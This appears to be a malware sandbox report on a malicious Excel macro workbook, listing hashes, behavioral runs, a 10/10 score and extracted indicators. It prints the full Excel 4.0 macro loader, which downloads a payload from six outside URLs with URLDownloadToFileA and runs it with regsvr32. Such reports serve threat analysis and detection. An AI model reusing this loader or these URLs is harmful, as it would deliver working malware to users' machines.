General
-
Target
395f28e820b7511df98bbf5fe1758e3624e0c9e11ad8005d51ee818e360e0347
-
Size
46KB
-
Sample
241111-vbnvaavnbq
-
MD5
0191641064fb537eb5bf246f01155f59
-
SHA1
6b5983fedfa2d69e9c0cbba17ab0975093de83b6
-
SHA256
395f28e820b7511df98bbf5fe1758e3624e0c9e11ad8005d51ee818e360e0347
-
SHA512
5c3b0587a598dd37f5bf22a8e499c3fcb4d815b9c78836c713b5ca2b181f455f199de81075c69df61ea6a91066e69b61e32cabd540f7569c9866a1bfd20feea2
-
SSDEEP
768:OEoTBvDOevZCwrvtWzdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Uh0VU2ceI:ZolvDmtT5fTR4Lh1NisFYBc3cr+UqVUz
Behavioral task
behavioral1
Sample
395f28e820b7511df98bbf5fe1758e3624e0c9e11ad8005d51ee818e360e0347.xlsm
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
395f28e820b7511df98bbf5fe1758e3624e0c9e11ad8005d51ee818e360e0347.xlsm
Resource
win10v2004-20241007-en
Malware Config
Extracted
http://moveconnects.com/wp-admin/network/7T8g9DAohsL/
http://benzo-pl.com/wp-content/NVJU3gASPcyRDctfsM/
http://mentalpeaks.care/kymogram/ex1hhh/
https://melhoreseudia.club/assets/JbQzzZ7UBaXq7bB/
http://meca-global.com/okickb/Vm1FMsVcbL/
http://bizfedlacounty.org/wp-auth/GxsV/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://moveconnects.com/wp-admin/network/7T8g9DAohsL/","..\enu.ocx",0,0) =IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://benzo-pl.com/wp-content/NVJU3gASPcyRDctfsM/","..\enu.ocx",0,0)) =IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://mentalpeaks.care/kymogram/ex1hhh/","..\enu.ocx",0,0)) =IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://melhoreseudia.club/assets/JbQzzZ7UBaXq7bB/","..\enu.ocx",0,0)) =IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://meca-global.com/okickb/Vm1FMsVcbL/","..\enu.ocx",0,0)) =IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bizfedlacounty.org/wp-auth/GxsV/","..\enu.ocx",0,0)) =IF('EFALGV'!D20<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\enu.ocx") =RETURN()
Extracted
http://moveconnects.com/wp-admin/network/7T8g9DAohsL/
http://benzo-pl.com/wp-content/NVJU3gASPcyRDctfsM/
http://mentalpeaks.care/kymogram/ex1hhh/
https://melhoreseudia.club/assets/JbQzzZ7UBaXq7bB/
http://meca-global.com/okickb/Vm1FMsVcbL/
Targets
-
-
Target
395f28e820b7511df98bbf5fe1758e3624e0c9e11ad8005d51ee818e360e0347
-
Size
46KB
-
MD5
0191641064fb537eb5bf246f01155f59
-
SHA1
6b5983fedfa2d69e9c0cbba17ab0975093de83b6
-
SHA256
395f28e820b7511df98bbf5fe1758e3624e0c9e11ad8005d51ee818e360e0347
-
SHA512
5c3b0587a598dd37f5bf22a8e499c3fcb4d815b9c78836c713b5ca2b181f455f199de81075c69df61ea6a91066e69b61e32cabd540f7569c9866a1bfd20feea2
-
SSDEEP
768:OEoTBvDOevZCwrvtWzdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Uh0VU2ceI:ZolvDmtT5fTR4Lh1NisFYBc3cr+UqVUz
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-